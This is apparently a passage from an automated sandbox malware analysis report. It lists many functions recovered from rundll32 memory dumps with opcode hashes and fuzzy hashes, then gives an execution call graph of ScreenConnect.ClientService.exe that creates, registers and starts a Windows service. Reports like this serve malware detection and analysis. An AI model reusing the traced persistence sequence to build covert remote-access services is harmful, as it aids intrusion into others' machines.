                                                                          • Instruction Fuzzy Hash: 4A1106B0D046098FDB10DFAAC484AEEFBF4FF48314F10842AD559A7240DB79A905CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B1968, Relevance: .1, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 84ab4f7ea046731ff4ebd3f6ed57fdfa5ad17f148ac5c643f4e8a44af879965b
                                                                          • Instruction ID: 9a28116aed353a9ce4c2202d95b49d42c5df3ba0bb12bd04364b593860638aa0
                                                                          • Opcode Fuzzy Hash: 84ab4f7ea046731ff4ebd3f6ed57fdfa5ad17f148ac5c643f4e8a44af879965b
                                                                          • Instruction Fuzzy Hash: C9118231601114EFDB14DFA5D455AB97BBAEF8C324F105019E409AB380DF79AC45CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B182A, Relevance: .0, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 527e617ec8a0ad187d220d6171d7e3561279f07bc824febd5c8f9447577e22f5
                                                                          • Instruction ID: 71148983f1fd5ca68574644e9a44264a4b4bd8fcb51d4c6daab685cbc3deb255
                                                                          • Opcode Fuzzy Hash: 527e617ec8a0ad187d220d6171d7e3561279f07bc824febd5c8f9447577e22f5
                                                                          • Instruction Fuzzy Hash: 5901A731A1110557F718AA6899653FF7BB6BBC8744F14842ED046A7280CE765C0297D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 007AD01D, Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.681324490.00000000007AD000.00000040.00000001.sdmp, Offset: 007AD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ad000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b9ceb039643f3899c4a102afb2be337589b15eb2892566516f506b1b4041fc13
                                                                          • Instruction ID: 5094d42f507d83320967c7f9966ef701fed82fc331f1ab7de7df5ffbfacafd81
                                                                          • Opcode Fuzzy Hash: b9ceb039643f3899c4a102afb2be337589b15eb2892566516f506b1b4041fc13
                                                                          • Instruction Fuzzy Hash: 9601F7B1508740AAD7304A26D884767BBD8EF82724F18861AED464B646C3BD9C45CAB2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B4618, Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c427948851294b312ab73a331afd550451c98e211921465e57d913ec22fcd540
                                                                          • Instruction ID: 7a206a39200ba85c97ebbfc8346a794122ac87f998246d7a6926ef020b2f8317
                                                                          • Opcode Fuzzy Hash: c427948851294b312ab73a331afd550451c98e211921465e57d913ec22fcd540
                                                                          • Instruction Fuzzy Hash: BF01A230B001149BEB28AFA9C8147EFBAE6AFC9644F14842DD405BB390DE75AD05DBD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B7D28, Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: edac78e266ae6bbf0453653a782c616b4299631be6bed0b169d540d8d65fedf0
                                                                          • Instruction ID: 07b5de3d3a50c7030e2e8a43fdb380700cc42393f9a347e8b464e6d023ab087a
                                                                          • Opcode Fuzzy Hash: edac78e266ae6bbf0453653a782c616b4299631be6bed0b169d540d8d65fedf0
                                                                          • Instruction Fuzzy Hash: A9F0BB317093102FD721992668D06FBBB6EFFDDA64B04402BE98587285DA146805A2F1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B6838, Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7fe931270c9d3286c31b03563b8294db023f9d8543577f12be7927c1f5cb73a1
                                                                          • Instruction ID: 780e17a71caae800eab45c66172fb496ce16382fc6526c156248c58cb79eb67b
                                                                          • Opcode Fuzzy Hash: 7fe931270c9d3286c31b03563b8294db023f9d8543577f12be7927c1f5cb73a1
                                                                          • Instruction Fuzzy Hash: FEF0373B7104208B8B18EF69F4548AE7BEBEBC9675304402AF909C7751DF34AC0A97A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B3828, Relevance: .0, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8b03e4822d07befa9bf08d15348bf3b7760529d08c54ed58a5b6e59b52db8810
                                                                          • Instruction ID: 996340ceffc90830d5027261af1b406fa37008d4e726ed9960416fffa27060e6
                                                                          • Opcode Fuzzy Hash: 8b03e4822d07befa9bf08d15348bf3b7760529d08c54ed58a5b6e59b52db8810
                                                                          • Instruction Fuzzy Hash: 7F010C70E0520A8FDB54DFA995012FEBBF1BB88304F108269D848E7250E7399941DBD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B52C8, Relevance: .0, Instructions: 39COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 36d751c2dcbe2ebc65815e0a251df787ac236612004ec595d911cce1fd7345e7
                                                                          • Instruction ID: 9c0555de92d8590f57c0758b22fb04d3ac286e6b0e8b758155ca427e32950334
                                                                          • Opcode Fuzzy Hash: 36d751c2dcbe2ebc65815e0a251df787ac236612004ec595d911cce1fd7345e7
                                                                          • Instruction Fuzzy Hash: 2FF0CD363093505F8710EF78EC4089B7BFAEFC9264315862AF649CB351EB709D0287A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B381B, Relevance: .0, Instructions: 39COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b87c87f8ef83707a0367f6a8feeec9771936f4519122baa4ab3b655649338110
                                                                          • Instruction ID: 6080326bd740d57bd9de53461df871c71571d24910f9b6dc54a6d241f7f377d7
                                                                          • Opcode Fuzzy Hash: b87c87f8ef83707a0367f6a8feeec9771936f4519122baa4ab3b655649338110
                                                                          • Instruction Fuzzy Hash: E7012C70E052058FDB54DFA985012EEFBF2BF89204F14866EE888F7205E7399541DB92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 007AD01C, Relevance: .0, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.681324490.00000000007AD000.00000040.00000001.sdmp, Offset: 007AD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ad000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d4940cc32ded888d8b0ea7b96fa83cdad5b13047282558c7b5debc5821153b85
                                                                          • Instruction ID: df51bfa00928967f7a1ad5031cd6ab6299a436981e0fe892916546b688bf13d1
                                                                          • Opcode Fuzzy Hash: d4940cc32ded888d8b0ea7b96fa83cdad5b13047282558c7b5debc5821153b85
                                                                          • Instruction Fuzzy Hash: B8F0C871404244AEE7208A16DC84767FFD8EF82734F14C55AED454F686C3B99C45CAB1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B1431, Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 912f502a819ec1ac3e8f74a86057cdeaaf87e060da95e6f3e9c3b35c61ec60f6
                                                                          • Instruction ID: 5148c806e0312842d022068d233790653390e8934fab890466b49c01a3eeb00c
                                                                          • Opcode Fuzzy Hash: 912f502a819ec1ac3e8f74a86057cdeaaf87e060da95e6f3e9c3b35c61ec60f6
                                                                          • Instruction Fuzzy Hash: 27F046306166450AD718AFB0B0661B53BAEEB8231C712006ED18ACF291EB249C06D3E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B52D8, Relevance: .0, Instructions: 34COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c64d9ef2d83ba46b6c02cb952f0c21c0157e75b13ea722e40725ca07c02bd125
                                                                          • Instruction ID: 7965b908713a125e12a7e523854114b1278851d80719430469a559dc52daad7c
                                                                          • Opcode Fuzzy Hash: c64d9ef2d83ba46b6c02cb952f0c21c0157e75b13ea722e40725ca07c02bd125
                                                                          • Instruction Fuzzy Hash: 5BF082313043146F8754EE6DE84495BB7EAEFC46B53518A29F60AC7350EB71EC0187E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B3A41, Relevance: .0, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 852d31b9e2d04682fe0dd4521a06dcb8b14888cbef4cac0b12728e11685a17f5
                                                                          • Instruction ID: bce927f8d64cbd6953f4bab26db27f9db430315f43512a7a7b2cd676428fdff5
                                                                          • Opcode Fuzzy Hash: 852d31b9e2d04682fe0dd4521a06dcb8b14888cbef4cac0b12728e11685a17f5
                                                                          • Instruction Fuzzy Hash: 7AE0922071425607FF24256465043EEABDA7BC0658F100779CCC6B6682E4D8EC4223D1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B7F1D, Relevance: .0, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3ffb6285526d7586c99f3a4c8f29b174f7fb4f6470113c29d562b2a3b2c1329d
                                                                          • Instruction ID: fcc48d26c1eaeaaf34e51e2b51beb1e6b08e48c3669c8a5757c231bd08fdc4d0
                                                                          • Opcode Fuzzy Hash: 3ffb6285526d7586c99f3a4c8f29b174f7fb4f6470113c29d562b2a3b2c1329d
                                                                          • Instruction Fuzzy Hash: 2FE0262225E2B00FC3014364A8608E53F684F4B214B0000DBE145DB363C4455D0087A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B5ED8, Relevance: .0, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fcf2c98d573260897f1e92a161bebcd316eba73a2fffa0df268f5c19c68724f4
                                                                          • Instruction ID: e04a514fd4617ca97964f5c4d7647222696ffef2ae0ae449375522ac6f802d81
                                                                          • Opcode Fuzzy Hash: fcf2c98d573260897f1e92a161bebcd316eba73a2fffa0df268f5c19c68724f4
                                                                          • Instruction Fuzzy Hash: D9E0D831A05208EFC740EFB4DD0658E7BA6DF96118B100199E508D7252EF311E009BA2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B2959, Relevance: .0, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7b63b7cdbb82994be295e383727ef06cfe4f05843c3efe78104d54bfa0e17f17
                                                                          • Instruction ID: 8e2e9541f3a98edfb1fb1d2472de3118f71da9c07ae4a1d5cf1b1f660cb16e99
                                                                          • Opcode Fuzzy Hash: 7b63b7cdbb82994be295e383727ef06cfe4f05843c3efe78104d54bfa0e17f17
                                                                          • Instruction Fuzzy Hash: 80E09A31A06284EFCB81EFB0ED4449EBBB6DF4A20432181DAF809DB512CA311F08DF60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B17F0, Relevance: .0, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 946403a54eea91729dfb5b5f8e18f4325d3c8a948a06cf3e98cd1c49f2b0227f
                                                                          • Instruction ID: 2f7941c6aec2d665ab3c8628eae7cf30dc842ccc2057960238de3c6332937082
                                                                          • Opcode Fuzzy Hash: 946403a54eea91729dfb5b5f8e18f4325d3c8a948a06cf3e98cd1c49f2b0227f
                                                                          • Instruction Fuzzy Hash: FCD097322D62041FD306A790B8028DA3F799B8633070800ABF444CF2B3EE2A0C53C3E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B3AC8, Relevance: .0, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ef12dcabf005168d90681493682feebc2d786bca3e0750c01fcad06d829a6075
                                                                          • Instruction ID: 9c5cee0258c4bd541697edc388c9a97eaadcc28164793d82c2e18166dcc01514
                                                                          • Opcode Fuzzy Hash: ef12dcabf005168d90681493682feebc2d786bca3e0750c01fcad06d829a6075
                                                                          • Instruction Fuzzy Hash: 85D09722A219502BD32432B430453E7AB8CDB89038F104036CD1CD7201C828880303D0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B0C38, Relevance: .0, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b5616e636aa576753ab42283677a3fd304b19497a74ae9125ae876d772763660
                                                                          • Instruction ID: b57190b241521b8a7ab11ebdf2a6870bdeae12b4aaf6afe302896288b2a107ad
                                                                          • Opcode Fuzzy Hash: b5616e636aa576753ab42283677a3fd304b19497a74ae9125ae876d772763660
                                                                          • Instruction Fuzzy Hash: 45D0A7353354305BC204536CD4409A9339DEB4D71C7111856F206C7360CE55BC0003D8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B0C0C, Relevance: .0, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 19eefce1fd782b267aafcd82e5694aeb49e494fb4f8efc073194439cedf055c8
                                                                          • Instruction ID: e9fae47eb82a25d829b3d1a8b1738b12d8f667aadd7815ac806ae57200f8d485
                                                                          • Opcode Fuzzy Hash: 19eefce1fd782b267aafcd82e5694aeb49e494fb4f8efc073194439cedf055c8
                                                                          • Instruction Fuzzy Hash: DCD0A93232612C2B5204A2A998248FE769ABB856B83605427B64093360EE61BC01A6E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B5EE8, Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 00c14ab45c3422138c7ccc40c0611eed623bc12b66d7d8d6936a0a38f344c3aa
                                                                          • Instruction ID: 6bbf2b9cf83c439a5d3e76d67e0ee2065e117cecf186cc4e76a49515311573ec
                                                                          • Opcode Fuzzy Hash: 00c14ab45c3422138c7ccc40c0611eed623bc12b66d7d8d6936a0a38f344c3aa
                                                                          • Instruction Fuzzy Hash: 97D05B3090120CEF8780EFF4DA0645F77B6EB45218B10459DE909D3211EF311F049B50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B2968, Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4ad698dc7c8f7f15e660da83e0693dc0701e3f18f524e2118bf529644bb8b4ce
                                                                          • Instruction ID: c693feb89195084d06da0272edd9a3375fa8840645d639be346a71f0bc521a10
                                                                          • Opcode Fuzzy Hash: 4ad698dc7c8f7f15e660da83e0693dc0701e3f18f524e2118bf529644bb8b4ce
                                                                          • Instruction Fuzzy Hash: 68D05B3190110CEF8740EFB4ED0555EB7FADB45204710859AF509D7201DE311F009F55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 045B0440, Relevance: .0, Instructions: 14COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000003.680599637.00000000045B0000.00000040.00000001.sdmp, Offset: 045B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_3_45b0000_rundll32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 613892f9a7abda019b5cb727580ac9307c3fa403238056cd14773981ef7867e6
                                                                          • Instruction ID: 2895a2eaf1b2e2ce39f66bbe3201dbbcd88b382e304bc519fac2fee203d562bc
                                                                          • Opcode Fuzzy Hash: 613892f9a7abda019b5cb727580ac9307c3fa403238056cd14773981ef7867e6
                                                                          • Instruction Fuzzy Hash: 6FC0807249E7406FF30603540C834E63F20E627718389D39BC040DD4D3910F5407D271
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Analysis Process: ScreenConnect.ClientService.exe PID: 6356 Parent PID: 568 ScreenConnect.ClientService.exeCOMMON

                                                                          Execution Graph

                                                                          Execution Coverage:4.8%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:1.2%
                                                                          Total number of Nodes:1889
                                                                          Total number of Limit Nodes:11

                                                                          Graph

                                                                          execution_graph 8227 3fcf7f 8229 3fcf2a __CallSettingFrame@12 8227->8229 8228 3fcf8e 8230 3fcfb3 ___FrameUnwindToState 58 API calls 8228->8230 8229->8228 8231 3f4cb0 IsInExceptionSpec 63 API calls 8229->8231 8232 3fcf9a 8230->8232 8231->8229 8233 3fcfa4 __initptd 8232->8233 8234 3f4cb0 IsInExceptionSpec 63 API calls 8232->8234 8234->8233 6597 3f1dfe 6637 3f3894 6597->6637 6599 3f1e03 __initptd 6641 3f3a7b GetStartupInfoW 6599->6641 6602 3f1e71 6604 3f1e7c 6602->6604 6759 3f1f58 6602->6759 6603 3f1e19 6643 3f226c GetProcessHeap 6603->6643 6644 3f2fd6 6604->6644 6607 3f1e82 6608 3f1e8d __RTC_Initialize 6607->6608 6609 3f1f58 _fast_error_exit 58 API calls 6607->6609 6665 3f3069 6608->6665 6609->6608 6611 3f1e9c 6612 3f1ea8 GetCommandLineA 6611->6612 6613 3f1f58 _fast_error_exit 58 API calls 6611->6613 6684 3f3970 GetEnvironmentStringsW 6612->6684 6615 3f1ea7 6613->6615 6615->6612 6619 3f1ecd 6708 3f354c 6619->6708 6623 3f1ede 6724 3f2305 6623->6724 6625 3f22cb __lock 58 API calls 6625->6623 6626 3f1ee6 6627 3f1ef1 6626->6627 6628 3f22cb __lock 58 API calls 6626->6628 6730 3f3dde 6627->6730 6628->6627 6632 3f1f05 6633 3f1f14 6632->6633 6774 3f256e 6632->6774 6777 3f22f6 6633->6777 6636 3f1f19 __initptd 6638 3f38b7 6637->6638 6639 3f38c4 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 6637->6639 6638->6639 6640 3f38bb 6638->6640 6639->6640 6640->6599 6642 3f3a91 6641->6642 6642->6603 6643->6602 6780 3f239d RtlEncodePointer 6644->6780 6646 3f2fdb 6785 3f4b02 6646->6785 6649 3f2fe4 6798 3f304c 6649->6798 6654 3f3001 6792 3f25b3 6654->6792 6657 3f3043 6658 3f304c __mtterm 61 API calls 6657->6658 6660 3f3048 6658->6660 6660->6607 6661 3f3022 6661->6657 6662 3f3028 6661->6662 6810 3f2f23 6662->6810 6664 3f3030 GetCurrentThreadId 6664->6607 6666 3f3075 __initptd 6665->6666 6667 3f49d1 __lock 58 API calls 6666->6667 6668 3f307c 6667->6668 6669 3f25b3 __calloc_crt 58 API calls 6668->6669 6671 3f308d 6669->6671 6670 3f30f8 GetStartupInfoW 6673 3f323c 6670->6673 6676 3f310d 6670->6676 6671->6670 6672 3f3098 __initptd @_EH4_CallFilterFunc@8 6671->6672 6672->6611 6674 3f3304 6673->6674 6678 3f3289 GetStdHandle 6673->6678 6680 3f329c GetFileType 6673->6680 6683 3f3a9e ___lock_fhandle InitializeCriticalSectionAndSpinCount 6673->6683 7069 3f3314 6674->7069 6676->6673 6677 3f25b3 __calloc_crt 58 API calls 6676->6677 6679 3f315b 6676->6679 6677->6676 6678->6673 6679->6673 6681 3f318f GetFileType 6679->6681 6682 3f3a9e ___lock_fhandle InitializeCriticalSectionAndSpinCount 6679->6682 6680->6673 6681->6679 6682->6679 6683->6673 6685 3f1eb8 6684->6685 6686 3f3983 WideCharToMultiByte 6684->6686 6697 3f331d 6685->6697 6688 3f39ed FreeEnvironmentStringsW 6686->6688 6689 3f39b6 6686->6689 6688->6685 6690 3f25fb __malloc_crt 58 API calls 6689->6690 6691 3f39bc 6690->6691 6691->6688 6692 3f39c3 WideCharToMultiByte 6691->6692 6693 3f39d9 6692->6693 6694 3f39e2 FreeEnvironmentStringsW 6692->6694 6695 3f1b1f __getptd_noexit 58 API calls 6693->6695 6694->6685 6696 3f39df 6695->6696 6696->6694 6698 3f332b 6697->6698 6699 3f3330 GetModuleFileNameA 6697->6699 7079 3f4f78 6698->7079 6701 3f335d 6699->6701 7073 3f33d0 6701->7073 6703 3f1ec2 6703->6619 6767 3f22cb 6703->6767 6705 3f25fb __malloc_crt 58 API calls 6706 3f3396 6705->6706 6706->6703 6707 3f33d0 _parse_cmdline 58 API calls 6706->6707 6707->6703 6709 3f3555 6708->6709 6712 3f355a _strlen 6708->6712 6711 3f4f78 ___initmbctable 70 API calls 6709->6711 6710 3f1ed3 6710->6623 6710->6625 6711->6712 6712->6710 6713 3f25b3 __calloc_crt 58 API calls 6712->6713 6720 3f3590 _strlen 6713->6720 6714 3f35e2 6715 3f1b1f __getptd_noexit 58 API calls 6714->6715 6715->6710 6716 3f25b3 __calloc_crt 58 API calls 6716->6720 6717 3f3609 6719 3f1b1f __getptd_noexit 58 API calls 6717->6719 6719->6710 6720->6710 6720->6714 6720->6716 6720->6717 6721 3f3620 6720->6721 7499 3f58c2 6720->7499 6722 3f29f1 __invoke_watson 8 API calls 6721->6722 6723 3f362c 6722->6723 6726 3f2311 __IsNonwritableInCurrentImage 6724->6726 7508 3f4c91 6726->7508 6727 3f232f __initterm_e 6729 3f234e _doexit __IsNonwritableInCurrentImage 6727->6729 7511 3f1c82 6727->7511 6729->6626 6731 3f3dea 6730->6731 6735 3f3def 6730->6735 6732 3f4f78 ___initmbctable 70 API calls 6731->6732 6732->6735 6733 3f1ef7 6736 3f1880 StartServiceCtrlDispatcherW 6733->6736 6734 3f5ecf _parse_cmdline 58 API calls 6734->6735 6735->6733 6735->6734 6737 3f18c9 VariantInit 6736->6737 6738 3f1a44 6736->6738 7577 3f1160 LoadLibraryW GetProcAddress 6737->7577 6740 3f1b07 __cftoe_l 6 API calls 6738->6740 6742 3f1a53 6740->6742 6742->6632 6743 3f1a19 VariantClear 6745 3f1b07 __cftoe_l 6 API calls 6743->6745 6744 3f18f9 OpenSCManagerW OpenServiceW 6746 3f194d RegOpenKeyW RegOpenKeyW 6744->6746 6747 3f1924 GetCommandLineW CreateServiceW 6744->6747 6748 3f1a33 6745->6748 6749 3f197b RegCreateKeyW 6746->6749 6750 3f1992 RegSetValueExW QueryServiceStatus 6746->6750 6747->6746 6748->6632 6749->6750 6751 3f19d8 QueryServiceStatus 6750->6751 6752 3f19c6 6750->6752 6754 3f19ff CloseServiceHandle CloseServiceHandle 6751->6754 6755 3f19e4 6751->6755 6752->6751 6753 3f19cd StartServiceW 6752->6753 6753->6751 6757 3f1a39 VariantClear 6754->6757 6758 3f1a15 6754->6758 6755->6754 6756 3f19eb Sleep QueryServiceStatus 6755->6756 6756->6754 6756->6755 6757->6738 6758->6743 6760 3f1f69 6759->6760 6761 3f1f64 6759->6761 6763 3f368a 